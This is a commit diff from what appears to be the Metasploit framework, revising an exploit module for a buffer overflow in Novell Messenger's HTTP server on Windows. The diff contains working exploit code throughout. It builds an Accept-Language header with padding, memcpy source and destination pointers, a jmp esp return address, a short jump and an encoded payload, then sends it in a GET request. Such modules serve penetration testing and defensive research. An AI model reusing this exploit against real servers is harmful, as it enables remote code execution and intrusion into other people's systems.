Updated
git-svn-id: file:///home/svn/incoming/trunk@3601 4d416f70-5f16-0410-b530-b9f4589650daunstable
HD Moore
parent
589205e5ff
commit
7e0f539b12
|
|
@ -31,9 +31,7 @@ class Exploits::Windows::Http::NovellMessengerAcceptLanguage < Msf::Exploit::Rem
|
|||
'Payload' =>
|
||||
{
|
||||
'Space' => 500,
|
||||
'BadChars' =>
|
||||
"\x00\x3a\x3b\x3c\x3d\x3e\x3f\x09\x0b\x0a\x0d\x20\x21\x22\x23\x24\x25\x26\x2c\x10"+
|
||||
[*("A".."Z")].join,
|
||||
'BadChars' => "\x00\x0a\x2c\x3b"+ [*("A".."Z")].join,
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
|
|
@ -49,34 +47,12 @@ class Exploits::Windows::Http::NovellMessengerAcceptLanguage < Msf::Exploit::Rem
|
|||
def exploit
|
||||
connect
|
||||
|
||||
lang =
|
||||
# Padding to reach the memcpy src pointer
|
||||
Rex::Text.rand_text_alphanumeric(16) +
|
||||
|
||||
# The source pointer for the memcpy
|
||||
[target['Rets'][1]].pack('V') +
|
||||
|
||||
# Padding to reach the stack return address
|
||||
Rex::Text.rand_text_alphanumeric(240)
|
||||
|
||||
# The return address (a jmp esp)
|
||||
[target['Rets'][0]].pack('V') +
|
||||
|
||||
# Jump over the next 6 bytes to payload
|
||||
"\xeb\x06" +
|
||||
|
||||
# Padding to reach the memcpy dst pointer
|
||||
Rex::Text.rand_text_alphanumeric(2) +
|
||||
|
||||
# The destination pointer for the memcpy
|
||||
[target['Rets'][1]].pack('V') +
|
||||
|
||||
# The actual payload
|
||||
payload.encoded +
|
||||
|
||||
# Padding to keep the request aligned in memory
|
||||
Rex::Text.rand_text_alphanumeric(1500-payload.encoded.length)
|
||||
|
||||
lang = Rex::Text.rand_text_alphanumeric(1900)
|
||||
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
|
||||
lang[272, 4] = [target['Rets'][1]].pack('V') # DST
|
||||
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
|
||||
lang[268, 2] = "\xeb\x06"
|
||||
lang[276, payload.encoded.length] = payload.encoded
|
||||
|
||||
res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n"
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue